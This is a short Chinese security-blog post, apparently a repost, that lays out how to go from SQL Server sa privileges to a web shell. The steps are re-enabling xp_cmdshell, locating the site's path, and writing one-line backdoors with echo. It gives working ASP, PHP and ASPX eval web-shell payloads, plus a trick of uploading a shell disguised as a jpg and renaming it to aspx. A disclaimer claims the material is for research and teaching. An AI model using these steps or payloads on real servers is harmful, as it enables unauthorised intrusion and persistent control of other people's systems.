1.通过SQL查询分析器通过sa权限首先恢复xp_cmdshell存储过程。
2.通过SQL Tools2.0连接数据库,执行命令,查看网站路径以及磁盘文件,获取网站的真实路径。
3.echo生成一句话后门。
4.直接获取webshell权限。
5.如果echo生成的一句话后门无法执行,可以通过查看对应网站的数据库,获取后台登陆密码,通过后台上传webshell的jpg。然后通过copy命令将jgp文件复制为aspx文件,从而获取webshell。
技巧:
1.寻找可写的文件夹,例如c:/windows/temp,以及网站的真实路劲。
2.通过echo命令生成一句话后门
echo ^<%eval request(cmd)% ^>^>d:/wwwroot/ok.asp
echo ^<?php @eval($_POST[cmd]);?^>^>cmd.php
echo ^<%@ PageLanguage="Jscript%"^>^<^%eval(Request.Item["pass"],"unsafe");%^>^>c:/inetpub/wwwroot/cmd.aspx
转自:原创 飓风网络安全
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论